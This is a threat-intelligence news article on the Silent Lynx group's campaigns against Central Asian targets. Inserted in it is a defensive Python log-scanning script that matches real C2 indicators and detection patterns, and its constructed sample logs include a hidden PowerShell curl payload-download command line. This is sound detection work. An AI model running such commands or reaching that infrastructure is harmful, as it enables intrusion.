A newly identified threat actor known as Silent Lynx has been linked to cyberattacks aimed at various organizations in Turkmenistan and Kyrgyzstan.
In a technical report released late last month, Seqrite Labs researcher Subhajeet Singha stated that "this threat group has recently targeted entities around Eastern Europe and Central Asian government think tanks" involved in the banking and economic decision-making sectors.
Targets of the hacking group's attacks include diplomats, lawyers, government-backed banks, and think tanks. It has been assessed to be a Kazakhstan-origin threat actor with a moderate level of confidence.
The infections begin with spear-phishing emails carrying a RAR archive attachment, which serves as the delivery vehicle for malicious payloads that grant remote access to the compromised hosts.
The first of the two campaigns, detected by the security firm on December 27, 2024, uses the RAR archive to launch an ISO file that, in turn, contains a malicious C++ binary and a decoy PDF file. The executable then runs a PowerShell script that uses Telegram bots (named "@south_korea145_bot" and "@south_afr_angl_bot") for command execution and data exfiltration.
Some of the commands issued through the bots are curl commands that download and save additional payloads from a remote server ("pweobmxdlboi[.]com") or from Google Drive.
The other campaign, in contrast, employs a malicious RAR archive containing two files: a decoy PDF and a Golang executable, the latter designed to establish a reverse shell to an attacker-controlled server ("185.122.171[.]22:8082").
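As an added example (not part of the article or of the Seqrite Labs report), the following Python script shows how a defender would turn the indicators quoted above into a quick log sweep: it refangs the defanged domain and IP:port, matches the two Telegram bot usernames, and adds two shape-based checks that the article's description implies but does not list as indicators: requests to the Telegram Bot API (`api.telegram.org/bot<token>/...`, the token itself being unknown) and PowerShell launching `curl` with an output file. The log lines, the internal IP addresses and the `<TOKEN_PLACEHOLDER>` string are constructed for the example; only the domain, the IP:port and the bot names come from the article.

```python
import re
from typing import Dict, List, Tuple

# Indicators as quoted in the article (from the Seqrite Labs report), kept defanged
# so this list stays safe to paste into tickets and wikis.
C2_DOMAIN = "pweobmxdlboi[.]com"
REVERSE_SHELL = "185.122.171[.]22:8082"
TELEGRAM_BOTS = ("@south_korea145_bot", "@south_afr_angl_bot")


def refang(indicator: str) -> str:
    """Undo common defanging so an indicator can be matched against raw logs."""
    return indicator.replace("[.]", ".").replace("[:]", ":").replace("hxxp", "http")


def split_host_port(indicator: str) -> Tuple[str, str]:
    """Split a (possibly defanged) host:port indicator into its refanged parts."""
    host, _, port = refang(indicator).rpartition(":")
    return host, port


# Telegram Bot API requests have the shape api.telegram.org/bot<token>/<method>.
# The token is not known from the article, so match the URL shape plus the
# methods a bot-based C2 needs: poll for commands, post results, upload files.
TELEGRAM_BOT_API = re.compile(
    r"api\.telegram\.org/bot[^/\s'\"]+/(getUpdates|sendMessage|sendDocument)", re.I
)
# Bot usernames as they would appear if the script text itself is logged
# (for example via PowerShell script block logging).
BOT_NAMES = re.compile("|".join(re.escape(b) for b in TELEGRAM_BOTS), re.I)
# PowerShell invoking curl with an output file: the article says the PowerShell
# script runs curl commands to download and save additional payloads.
PS_CURL_DOWNLOAD = re.compile(r"powershell[^\n]*\bcurl(\.exe)?\b[^\n]*\s-o\s", re.I)


def classify_line(line: str) -> List[str]:
    """Return the names of every indicator that fires on a single log line."""
    hits: List[str] = []
    if refang(C2_DOMAIN).lower() in line.lower():
        hits.append("c2-domain")
    host, port = split_host_port(REVERSE_SHELL)
    # Word boundaries keep 185.122.171.22 from matching 185.122.171.220 and
    # keep the port from matching an unrelated ephemeral source port.
    if re.search(rf"\b{re.escape(host)}\b", line) and re.search(rf"\b{port}\b", line):
        hits.append("reverse-shell-endpoint")
    if TELEGRAM_BOT_API.search(line):
        hits.append("telegram-bot-api")
    if BOT_NAMES.search(line):
        hits.append("telegram-bot-name")
    if PS_CURL_DOWNLOAD.search(line):
        hits.append("powershell-curl-download")
    return hits


def scan(lines: List[str]) -> Dict[int, List[str]]:
    """Map line index -> indicator names for every line with at least one hit."""
    return {i: h for i, line in enumerate(lines) if (h := classify_line(line))}


# Constructed sample logs (not real telemetry); internal IPs and token are made up.
SAMPLE_LOGS = [
    # Proxy log: payload fetch from the domain named in the report.
    "2024-12-27T10:02:11Z proxy client=10.0.4.17 method=GET url=http://pweobmxdlboi.com/update.bin status=200",
    # Process-creation log: PowerShell shelling out to curl with an output file.
    '2024-12-27T10:02:09Z EventID=1 Image=C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe '
    'CommandLine="powershell -w hidden curl.exe -s http://pweobmxdlboi.com/p.bin -o C:\\Users\\Public\\p.bin"',
    # Proxy log: Telegram Bot API poll; the token is a placeholder, not a real value.
    "2024-12-27T10:02:30Z proxy client=10.0.4.17 method=GET url=https://api.telegram.org/bot<TOKEN_PLACEHOLDER>/getUpdates status=200",
    # Firewall log: outbound connection to the Golang reverse-shell endpoint.
    "2024-12-27T11:40:02Z fw action=allow src=10.0.4.21:51322 dst=185.122.171.22:8082 proto=tcp",
    # Benign traffic that must not fire.
    "2024-12-27T10:03:00Z proxy client=10.0.4.18 method=GET url=https://www.example.com/ status=200",
    "2024-12-27T10:03:05Z fw action=allow src=10.0.4.21:51330 dst=93.184.216.34:443 proto=tcp",
]


if __name__ == "__main__":
    for idx, names in scan(SAMPLE_LOGS).items():
        print(f"line {idx}: {', '.join(names)}")
```

The exact-match indicators age quickly once the actor rotates infrastructure; the two shape-based checks (Bot API URL pattern, PowerShell-driven curl download) are the part worth keeping as a standing detection, tuned against legitimate Telegram and curl use in your environment.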
According to Seqrite Labs, the threat actor shares tactical overlaps with another group (also known as SturgeonPhisher) that has been linked to attacks using Golang and PowerShell against Commonwealth of Independent States (CIS) nations.
"Silent Lynx's campaigns demonstrate a sophisticated multi-stage attack strategy using ISO files, C++ loaders, PowerShell scripts, and Golang implants," Singha said.
Their reliance on Telegram bots for command and control, combined with decoy documents and regional targeting, also highlights their focus on espionage in Central Asia and SPECA-based countries.